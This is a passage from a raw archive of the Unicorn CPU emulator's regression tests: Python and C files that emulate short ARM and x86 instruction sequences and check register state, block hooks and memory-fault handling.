Uc(UC_ARCH_ARM, UC_MODE_ARM) mem_size = 2 * (1024 * 1024) mu.mem_map(ADDRESS, mem_size) stack_address = ADDRESS + mem_size stack_size = stack_address # >>> here huge memory size mu.mem_map(stack_address, stack_size) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_R0, 0x1234) mu.reg_write(UC_ARM_REG_R2, 0x6789) mu.reg_write(UC_ARM_REG_R3, 0x3333) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_ARM_REG_R0) r1 = mu.reg_read(UC_ARM_REG_R1) print(">>> R0 = 0x%x" %r0) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) def test_thumb(): print("Emulate THUMB code") try: # Initialize emulator in thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, THUMB_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(THUMB_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) print(">>> SP = 0x%x" %sp) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_arm() print("=" * 20) test_thumb() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_memcpy_neon.py������������������������������������������������������0000664�0000000�0000000�00000005406�14675241067�0021547�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.arm_const import * # .text:0001F894 ADD PC, PC, R3 # .text:0001F898 ; --------------------------------------------------------------------------- # .text:0001F898 VLD1.8 {D0}, [R1]! # .text:0001F89C VST1.8 {D0}, [R12]! # .text:0001F8A0 VLD1.8 {D0}, [R1]! # .text:0001F8A4 VST1.8 {D0}, [R12]! # .text:0001F8A8 VLD1.8 {D0}, [R1]! # .text:0001F8AC VST1.8 {D0}, [R12]! # .text:0001F8B0 VLD1.8 {D0}, [R1]! # .text:0001F8B4 VST1.8 {D0}, [R12]! # .text:0001F8B8 VLD1.8 {D0}, [R1]! # .text:0001F8BC VST1.8 {D0}, [R12]! # .text:0001F8C0 VLD1.8 {D0}, [R1]! # .text:0001F8C4 VST1.8 {D0}, [R12]! # .text:0001F8C8 VLD1.8 {D0}, [R1]! # .text:0001F8CC VST1.8 {D0}, [R12]! # .text:0001F8D0 TST R2, #4 # .text:0001F8D4 LDRNE R3, [R1],#4 # .text:0001F8D8 STRNE R3, [R12],#4 # .text:0001F8DC MOVS R2, R2,LSL#31 # .text:0001F8E0 LDRHCS R3, [R1],#2 # .text:0001F8E4 LDRBNE R1, [R1] # .text:0001F8E8 STRHCS R3, [R12],#2 # .text:0001F8EC STRBNE R1, [R12] shellcode = [0x3, 0xf0, 0x8f, 0xe0, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0xd, 0x7, 0x21, 0xf4, 0xd, 0x7, 0xc, 0xf4, 0x4, 0x0, 0x12, 0xe3, 0x4, 0x30, 0x91, 0x14, 0x4, 0x30, 0x8c, 0x14, 0x82, 0x2f, 0xb0, 0xe1, 0xb2, 0x30, 0xd1, 0x20, 0x0, 0x10, 0xd1, 0x15, 0xb2, 0x30, 0xcc, 0x20, 0x0, 0x10, 0xcc, 0x15] base = 0x1F894 from_address = 0x1000 to_address = 0x2000 cplen = 8 bs = b"c8"*cplen uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.mem_map(from_address, 0x1000) uc.mem_map(to_address, 0x1000) uc.mem_map(0x1F000, 0x1000) uc.mem_write(from_address, bs) uc.mem_write(base, bytes(shellcode)) uc.reg_write(UC_ARM_REG_R12, to_address) uc.reg_write(UC_ARM_REG_R1, from_address) uc.reg_write(UC_ARM_REG_R2, cplen) uc.reg_write(UC_ARM_REG_R3, 0x24) # enable_vfp uc.reg_write(UC_ARM_REG_C1_C0_2, uc.reg_read(UC_ARM_REG_C1_C0_2) | (0xf << 20)) uc.reg_write(UC_ARM_REG_FPEXC, 0x40000000) uc.emu_start(base, base+len(shellcode)) fr = uc.mem_read(from_address, len(bs)) to = uc.mem_read(to_address, len(bs)) print(f"memcpy result:\nfrom: {bytes(fr)}\nto: {bytes(to)}")����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_movr12_hang.py������������������������������������������������������0000775�0000000�0000000�00000001476�14675241067�0021367�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.arm_const import * import regress class MovHang(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.mem_map(0x1000, 0x1000) uc.mem_write(0x1000, '00c000e3'.decode('hex')) # movw r12, #0 def hook_block(uc, addr, *args): print 'enter block 0x%04x' % addr uc.count += 1 uc.reg_write(UC_ARM_REG_R12, 0x123) self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x123) uc.hook_add(UC_HOOK_BLOCK, hook_block) uc.count = 0 #print 'block should only run once' uc.emu_start(0x1000, 0x1004, timeout=500) self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x0) self.assertEquals(uc.count, 1) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_vldr_invalid.py�����������������������������������������������������0000775�0000000�0000000�00000000657�14675241067�0021721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.arm_const import * import regress class VldrPcInsn(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.mem_map(0x1000, 0x1000) uc.mem_write(0x1000, 'ed9f8a3d'.decode('hex')) # vldr s16, [pc, #244] # this will raise invalid insn uc.emu_start(0x1000, 0x1004) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_wfi_first_insn_of_tb.py���������������������������������������������0000664�0000000�0000000�00000000577�14675241067�0023436�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.arm_const import * # ADD R0, R10, R0; # B L0; # L0: # ADD R0, R10, R0; <--- we stop at here, the first instruction of the next TB. code = b'\x00\x00\x8a\xe0\xff\xff\xff\xea\x00\x00\x8a\xe0' address = 0x1000 mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) mu.mem_map(address, 0x1000) mu.mem_write(address, code) mu.emu_start(address, address + len(code) - 4)���������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/bad_ram.py��������������������������������������������������������������0000775�0000000�0000000�00000001317�14675241067�0017764�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress class Hang(regress.RegressTest): def runTest(self): PAGE_SIZE = 0x5000 CODE_ADDR = 0x400000 RSP_ADDR = 0x200000 binary1 = "\xCA\x24\x5D" # retf 0x5d24 mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(CODE_ADDR, PAGE_SIZE) mu.mem_map(RSP_ADDR, PAGE_SIZE) mu.mem_write(CODE_ADDR, binary1) mu.reg_write(UC_X86_REG_RSP, RSP_ADDR) try: self.assertEqual(mu.emu_start(CODE_ADDR, CODE_ADDR + PAGE_SIZE, 0), UC_ERR_FETCH_INVALID) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/block_test.c������������������������������������������������������������0000664�0000000�0000000�00000005515�14675241067�0020323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <sys/types.h> #include <stdlib.h> #include <string.h> #include <unicorn/unicorn.h> static int count = 1; // Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) // @address: address where the code is being executed // @size: size of machine instruction being executed // @user_data: user data passed to tracing APIs. void cb_hookblock(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { fprintf(stderr, "# >>> Tracing basic block at 0x%"PRIx64", block size = 0x%x\n", address, size); if (address != 0x1000000 && address != 0x1000200) { fprintf(stderr, "not ok %d - address != 0x1000000 && address != 0x1000200\n", count++); _exit(1); } fprintf(stderr, "ok %d - address (0x%x) is start of basic block\n", count++, (uint32_t)address); if (size != 0x200) { fprintf(stderr, "not ok %d - basic block size != 0x200\n", count++); _exit(1); } fprintf(stderr, "ok %d - basic block size is correct\n", count++); } int main(void) { uc_engine *uc; fprintf(stderr, "# basic block callback test\n"); fprintf(stderr, "# there are only two basic blocks 0x1000000-0x10001ff and 0x1000200-0x10003ff\n"); uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_open\n", count++); err = uc_mem_map(uc, 0x1000000, 4096, UC_PROT_ALL); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_map\n", count++); uint8_t code[1024]; //build a program that consists of 1019 nops followed by a jump -512 //this program contains exactly 2 basic blocks, a block of 512 nops, followed //by a loop body containing 507 nops and jump to the top of the loop //the first basic block begins at address 0x1000000, and the second //basic block begins at address 0x1000200 memset(code, 0x90, sizeof(code)); memcpy(code + 1024 - 5, "\xe9\x00\xfe\xff\xff", 5); err = uc_mem_write(uc, 0x1000000, code, sizeof(code)); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_write\n", count++); uc_hook h1; err = uc_hook_add(uc, &h1, UC_HOOK_BLOCK, cb_hookblock, NULL, 1, 0); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_hook_add\n", count++); err = uc_emu_start(uc, 0x1000000, 0x1000000 + sizeof(code), 0, 1030); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_emu_start\n", count++); fprintf(stderr, "ok %d - Done", count++); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/callback-pc.py����������������������������������������������������������0000775�0000000�0000000�00000005643�14675241067�0020541�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # reg_write() can't modify PC from within trace callbacks # issue #210 from __future__ import print_function from unicorn import * from unicorn.arm_const import * import regress BASE_ADDRESS = 0x10000000 # sub sp, #0xc THUMB_CODE = "\x83\xb0" * 5 # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size)) mu = user_data print(">>> Setting PC to 0xffffffff") mu.reg_write(UC_ARM_REG_PC, 0xffffffff) # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) mu = user_data print(">>> Setting PC to 0xffffffff") mu.reg_write(UC_ARM_REG_PC, 0xffffffff) class CallBackPCTest(regress.RegressTest): def test_instruction_trace(self): try: # initialize emulator in ARM's Thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) # map some memory mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(BASE_ADDRESS, THUMB_CODE) # setup stack mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, user_data=mu) # emulate one instruction mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) # the instruction trace callback set PC to 0xffffffff, so at this # point, the PC value should be 0xffffffff. pc = mu.reg_read(UC_ARM_REG_PC) self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by instruction trace callback") except UcError as e: self.assertFalse(0, "ERROR: %s" % e) def test_block_trace(self): try: # initialize emulator in ARM's Thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) # map some memory mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(BASE_ADDRESS, THUMB_CODE) # setup stack mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) # trace blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block, user_data=mu) # emulate one instruction mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) # the block callback set PC to 0xffffffff, so at this point, the PC # value should be 0xffffffff. pc = mu.reg_read(UC_ARM_REG_PC) self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by block callback") except UcError as e: self.assertFalse(0, "ERROR: %s" % e) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/crash_tb.py�������������������������������������������������������������0000775�0000000�0000000�00000001556�14675241067�0020171�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress CODE_ADDR = 0x0 binary1 = b'\xb8\x02\x00\x00\x00' binary2 = b'\xb8\x01\x00\x00\x00' class CrashTB(regress.RegressTest): def runTest(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(CODE_ADDR, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(CODE_ADDR, binary1) # emu for maximum 1 sec. mu.emu_start(CODE_ADDR, len(binary1), UC_SECOND_SCALE) self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) # write machine code to be emulated to memory mu.mem_write(CODE_ADDR, binary2) # emu for maximum 1 sec. mu.emu_start(CODE_ADDR, len(binary2), UC_SECOND_SCALE) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/deadlock_1.py�����������������������������������������������������������0000775�0000000�0000000�00000000663�14675241067�0020370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # From issue #1 of Ryan Hileman from unicorn import * import regress CODE = b"\x90\x91\x92" class DeadLock(regress.RegressTest): def runTest(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x100000, 4 * 1024) mu.mem_write(0x100000, CODE) with self.assertRaises(UcError): mu.emu_start(0x100000, 0x1000 + len(CODE)) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������unicorn-2.1.1/tests/regress/eflags_noset.c����������������������������������������������������������0000664�0000000�0000000�00000006201�14675241067�0020634�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <assert.h> #include <unicorn/unicorn.h> #define X86_CODE32 "\x9C\x68\xFF\xFE\xFF\xFF\x9D\x9C\x58\x9D" // pushf; push ffffffeff; popf; pushf; pop eax; popf #define ADDRESS 0x1000000 #define PAGE_8K (1 << 13) #define PAGE_4K (1 << 12) #define TARGET_PAGE_MASK ~(PAGE_4K - 1) #define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) #define TARGET_PAGE_ALIGN(addr) (addr - (TARGET_PAGE_PREPARE(addr) - addr) & TARGET_PAGE_MASK) #if defined(__i386__) typedef uint32_t puint; #define PRIX3264 PRIX32 #else typedef uint64_t puint; #define PRIX3264 PRIX64 #endif uint32_t realEflags(void) { puint val = 0; #if defined(__i386__) puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. __asm__("pushf\n\t" "push %0\n\t" "popf\n\t" "pushf\n\t" "pop %0\n\t" "popf" : "=r"(val) : "r"(i) : "%0"); #elif defined(__x86_64__) puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. __asm__("pushfq\n\t" "pushq %0\n\t" "popfq\n\t" "pushfq\n\t" "popq %0\n\t" "popfq" : "=r"(val) : "r"(i) : "%0"); #endif printf("Real system eflags: 0x%08"PRIX3264"\n", val); return (uint32_t)val & 0xFFFFFFFF; } static void VM_exec(void) { #if defined(__i386__) || defined(__x86_64__) uc_engine *uc; uc_err err; unsigned int r_eax, eflags, r_esp, realflags = 0; r_eax = 0; r_esp = ADDRESS+0x100; //some safe distance from main code. eflags = 0x00000206; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return; } err = uc_mem_map(uc, ADDRESS, (2 * 1024 * 1024), UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write emulation code to memory, quit!: %s(len %lu)\n", uc_strerror(err), (unsigned long)sizeof(X86_CODE32) - 1); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); //make stack pointer point to already mapped memory so we don't need to hook. uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return; } uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); uc_close(uc); printf(">>> Emulation done. Below is the CPU context\n"); printf(">>> EAX = 0x%08X\n", r_eax); printf(">>> EFLAGS = 0x%08X\n", eflags); realflags = realEflags(); assert(r_eax == realflags); #endif } int main(int argc, char *argv[]) { VM_exec(); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/eflags_nosync.c���������������������������������������������������������0000664�0000000�0000000�00000014054�14675241067�0021022�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <assert.h> #include <unicorn/unicorn.h> #define X86_CODE32 "\x33\xD2\x8A\xD4\x8B\xC8\x81\xE1\xFF\x00\x00\x00" // XOR edx,edx; MOV dl,ah; MOV ecx,eax; AND ecx,FF #define ADDRESS 0x1000000 #define PAGE_8K (1 << 13) #define PAGE_4K (1 << 12) #define TARGET_PAGE_MASK ~(PAGE_4K - 1) #define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) #define TARGET_PAGE_ALIGN(addr) ((addr - (TARGET_PAGE_PREPARE(addr) - addr)) & TARGET_PAGE_MASK) static uint64_t instructions = 0; static void hook_ins(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { instructions++; } static bool hook_invalid_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { uc_err err; uint64_t address_align = TARGET_PAGE_ALIGN(address); if(address == 0) { printf("Address is 0, proof 0x%" PRIx64 "\n", address); return false; } switch(type) { default: return false; break; case UC_MEM_WRITE_UNMAPPED: printf("Mapping write address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory on UC_MEM_WRITE_UNMAPPED %s\n", uc_strerror(err)); return false; } return true; break; case UC_MEM_READ_UNMAPPED: printf("Mapping read address 0x%" PRIx64 " to aligned 0x%" PRIx64 "\n", address, address_align); err = uc_mem_map(uc, address_align, PAGE_8K, UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory on UC_MEM_READ_UNMAPPED %s\n", uc_strerror(err)); return false; } return true; break; } } static void VM_exec(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; unsigned int r_eax, r_ebx, r_ecx, r_edx, r_ebp, r_esp, r_esi, r_edi, r_eip, eflags; unsigned int tr_eax, tr_ebx, tr_ecx, tr_edx, tr_ebp, tr_esp, tr_esi, tr_edi, tr_eip, t_eflags; r_eax = tr_eax = 0x1DB10106; r_ebx = tr_ebx = 0x7EFDE000; r_ecx = tr_ecx = 0x7EFDE000; r_edx = tr_edx = 0x00001DB1; r_ebp = tr_ebp = 0x0018FF88; r_esp = tr_esp = 0x0018FF14; r_esi = tr_esi = 0x0; r_edi = tr_edi = 0x0; r_eip = tr_eip = 0x004939F3; t_eflags = eflags = 0x00000206; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s", uc_strerror(err)); return; } err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s", uc_strerror(err)); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write emulation code to memory, quit!: %s(len %zu)", uc_strerror(err), sizeof(X86_CODE32) - 1); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx); uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); uc_reg_write(uc, UC_X86_REG_EBP, &r_ebp); uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); uc_reg_write(uc, UC_X86_REG_ESI, &r_esi); uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); uc_reg_write(uc, UC_X86_REG_EFLAGS, &eflags); uc_hook_add(uc, &trace1, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, (void *)hook_invalid_mem, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, (void *)hook_ins, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s", err, uc_strerror(err)); instructions = 0; uc_close(uc); return; } uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); uc_reg_read(uc, UC_X86_REG_EBP, &r_ebp); uc_reg_read(uc, UC_X86_REG_ESP, &r_esp); uc_reg_read(uc, UC_X86_REG_ESI, &r_esi); uc_reg_read(uc, UC_X86_REG_EDI, &r_edi); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); uc_close(uc); printf(">>> Emulation done. Below is the CPU context\n"); printf(">>> EAX = 0x%08X %s\n", r_eax, (r_eax == tr_eax ? "" : "(m)")); printf(">>> EBX = 0x%08X %s\n", r_ebx, (r_ebx == tr_ebx ? "" : "(m)")); printf(">>> ECX = 0x%08X %s\n", r_ecx, (r_ecx == tr_ecx ? "" : "(m)")); printf(">>> EDX = 0x%08X %s\n", r_edx, (r_edx == tr_edx ? "" : "(m)")); printf(">>> EBP = 0x%08X %s\n", r_ebp, (r_ebp == tr_ebp ? "" : "(m)")); printf(">>> ESP = 0x%08X %s\n", r_esp, (r_esp == tr_esp ? "" : "(m)")); printf(">>> ESI = 0x%08X %s\n", r_esi, (r_esi == tr_esi ? "" : "(m)")); printf(">>> EDI = 0x%08X %s\n", r_edi, (r_edi == tr_edi ? "" : "(m)")); printf(">>> EIP = 0x%08X %s\n", (r_eip - ADDRESS) + tr_eip, (r_eip == tr_eip ? "" : "(m)\n")); printf(">>> EFLAGS = 0x%08X %s\n", eflags, (eflags == t_eflags ? "" : "(m)")); printf(">>> Instructions executed %" PRIu64 "\n", instructions); assert(r_eax == 0x1DB10106); assert(r_ebx == 0x7EFDE000); assert(r_ecx == 0x00000006); assert(r_edx == 0x00000001); assert(r_ebp == 0x0018FF88); assert(r_esp == 0x0018FF14); assert(r_esi == 0x00000000); assert(r_edi == 0x00000000); assert(eflags == 0x00000206); //we shouldn't fail this assert, eflags should be 0x00000206 because the last AND instruction produces a non-zero result. instructions = 0; } int main(int argc, char *argv[]) { VM_exec(); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/emu_clear_errors.c������������������������������������������������������0000664�0000000�0000000�00000010732�14675241067�0021517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <sys/types.h> #include <stdlib.h> #include <string.h> #include <unicorn/unicorn.h> static int count = 1; bool cb_hookunmapped(uc_engine *uc, uc_mem_type type, uint64_t address, uint32_t size, int64_t value, void *user_data) { uint32_t pc = 0; uc_reg_read(uc, UC_X86_REG_EIP, &pc); fprintf(stderr, "mem unmapped: 0x%x type: %x address: 0x%"PRIx64" length: %x value: 0x%"PRIx64"\n", pc, type, address, size, value); uc_err err = UC_ERR_OK; err = uc_emu_stop(uc); if (err != UC_ERR_OK) { fprintf(stderr, "stop not ok"); exit(0); } return true; } // move esi, dword ptr [ecx + eax + 0x28] // add esi, eax // lea eax, dword ptr [ebp - 4] // push eax // push 0x40 // push 0x10 // push esi // call some address #define CODE "\x8B\x74\x01\x28" \ "\x0C\xF0" \ "\x8D\x45\xFC" \ "\x50" \ "\x6A\x40" \ "\x6A\x10" \ "\x56" \ "\xFF\x15\x20\x20\x00\x10" int main(void) { uc_engine *uc; uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_open\n", count++); err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_map: code\n", count++); uint8_t code[0x1000]; memset(code, 0x0, sizeof(code)); memcpy(code, CODE, sizeof(CODE)); err = uc_mem_write(uc, 0x1000, code, sizeof(code)); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_write: code\n", count++); uint32_t eip = 0x1000; err = uc_reg_write(uc, UC_X86_REG_EIP, &eip); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_reg_write: eip\n", count++); err = uc_mem_map(uc, 0x4000, 0x4000, UC_PROT_ALL); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_map: stack\n", count++); uint8_t stack[0x4000]; memset(stack, 0x0, sizeof(stack)); err = uc_mem_write(uc, 0x4000, code, sizeof(code)); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); exit(0); } fprintf(stderr, "ok %d - uc_mem_write: stack\n", count++); uint32_t esp = 0x6000; err = uc_reg_write(uc, UC_X86_REG_ESP, &esp); if (err != UC_ERR_OK) { fprintf(stderr, "not ok %d - %s\n", count++, 